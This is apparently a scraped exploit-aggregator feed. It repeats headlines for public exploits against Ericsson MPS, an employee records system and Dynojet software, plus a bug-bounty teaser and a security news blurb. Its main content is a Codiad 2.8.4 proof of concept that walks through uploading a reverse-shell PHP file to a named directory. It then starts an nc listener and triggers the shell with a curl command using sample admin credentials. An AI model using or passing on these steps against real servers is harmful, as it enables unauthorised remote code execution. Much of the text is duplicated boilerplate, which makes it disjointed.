Exploit Collector
Ericsson Network Location MPS GMPC21 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Ericsson Network Location MPS GMPC21 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Ericsson Network Location MPS GMPC21 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Codiad 2.8.4 Shell Upload
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Codiad version 2.8.4 remote reverse shell upload exploit. Original discovery of code execution in this version is attributed to WangYihang in 2018.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Codiad 2.8.4 Shell Upload
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Codiad version 2.8.4 remote reverse shell upload exploit. Original discovery of code execution in this version is attributed to WangYihang in 2018.
MD5 |
221c2c5e5a6e53dff35451f35d9e550eDownload
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Type: WebApp
###################-------------------------##########################------------###################
# Proof of Concept: #
# #
# 1- login on codiad #
# #
# 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
# #
# 3- right click and select upload file #
# #
# 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file #
# #
###################-------------------------#########################-------------###################
after that your file should be in INF directory, right click on your file and select delete,
and you will see the full path of your file
run it in your terminal with "curl" and boom!!
/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
1 - # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Codiad 2.8.4 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Ericsson Network Location MPS GMPC21 Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Ericsson Network Location MPS GMPC21 Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Ericsson Network Location MPS GMPC21 Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Employee Record Management System 1.2 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Employee Record Management System 1.2 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Employee Record Management System 1.2 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Dynojet Power Core 2.3.0 Unquoted Service Path
___________________________
@hacking_Attack
@Hacking_Video
Dynojet Power Core 2.3.0 Unquoted Service Path
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Dynojet Power Core 2.3.0 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hello Folks, I am Vinay Jagetiya(princej_76)!!!Continue reading on Medium » (https://princej-76.medium.com/bypassed-rate-limit-17a15e357f00?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bypassed Rate Limit
Hello Folks, I am Vinay Jagetiya(princej_76)!!!
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SaaS and Third-Party Risk: Is Your Organization Asking the Hard Questions?
An investment in due diligence might prevent your organization from being part of next week's breach news cycle.
___________________________
@hacking_Attack
@Hacking_Video
SaaS and Third-Party Risk: Is Your Organization Asking the Hard Questions?
An investment in due diligence might prevent your organization from being part of next week's breach news cycle.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
SaaS and Third-Party Risk: Is Your Organization Asking the Hard Questions?
An investment in due diligence might prevent your organization from being part of next week's breach news cycle.
ADLab - Custom PowerShell Module To Setup An Active Directory Lab Environment To Practice Penetration Testing
http://www.kitploit.com/2021/11/adlab-custom-powershell-module-to-setup.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/11/adlab-custom-powershell-module-to-setup.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
ADLab - Custom PowerShell Module To Setup An Active Directory Lab Environment To Practice Penetration Testing